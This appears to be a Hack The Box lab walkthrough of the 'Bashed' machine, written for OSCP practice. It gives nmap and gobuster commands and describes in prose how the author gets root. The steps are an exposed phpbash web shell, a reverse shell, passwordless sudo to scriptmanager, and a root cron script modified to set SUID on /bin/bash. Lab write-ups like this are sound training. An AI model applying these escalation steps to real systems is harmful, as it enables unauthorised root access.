#1 — OSCP prep: HTB — Bashed

My walkthrough of a Hack The Box retired machine.

Machine: Bashed
IP: 10.129.202.29
OS: Linux
Difficulty: Easy

Reconnaissance

Let’s first start off by doing a Nmap scan on the target machine to find out which ports are open and what services are running on those ports.

SYNTAX:
sudo nmap -T4 -v -p- 10.129.202.29
sudo nmap -T4 -sC -sV -p80 -oN nmap_bashed.txt 10.129.202.29

Figure 1.0 — Nmap port scan results

From the nmap scan, we find that only port 80 is open. Let’s head over to the website and see what kind of information we can find.

We can see that this website talks about a web shell called phpbash, which was apparently developed on this web server. There is also a GitHub link for phpbash — https://github.com/Arrexel/phpbash.

There’s not much else we can see or do on this website, so let’s see if there are any other directories or files we can find using Gobuster.

SYNTAX:
gobuster dir -u <target URL> -w <wordlist> -x <extensions>

Figure 1.1 — Gobuster scan results

After looking through the different directories and files found from the Gobuster scan, I noticed a phpbash.php file in the dev/ directory that gives us a web shell! Through this file misconfiguration, we gain our initial access into the system.

Figure 1.2 — File misconfiguration

Privilege Escalation

Now that we’ve gained user access into the system, let’s try to escalate our privileges and gain root access.

However, before moving on, let’s change from this web-based shell to a more stabilized shell. I found and used a PHP reverse shell payload from “PayloadsAllTheThings” to give myself a more functional shell to work with.

Figure 1.3 — Improving my shell

Once I get a user shell, I always first check to see if I can run commands with sudo, and it seems that I can run any command with no password using sudo as scriptmanager. I take advantage of this and spawn myself a bash shell as scriptmanager.

Figure 1.4 — Spawning a bash shell as scriptmanager

Looking around through the file system, I found a scripts directory that belonged to scriptmanager. Inside that directory is a test.py file that gets executed every minute, and I found this out because it was updating a text file in that same directory every minute. The text file is owned by root, which means that root is running the python script.

Figure 1.5 — Contents of the scripts directory

To take advantage of this, I modify the python script so that it sets the SUID bit of /bin/bash, which in turn will allow me to run bash as root.

Figure 1.6 — Modifying test.py

Figure 1.7 — Becoming root

We successfully gained root access to the system!

Figure 1.8 — Root flag

See you on the other side coop.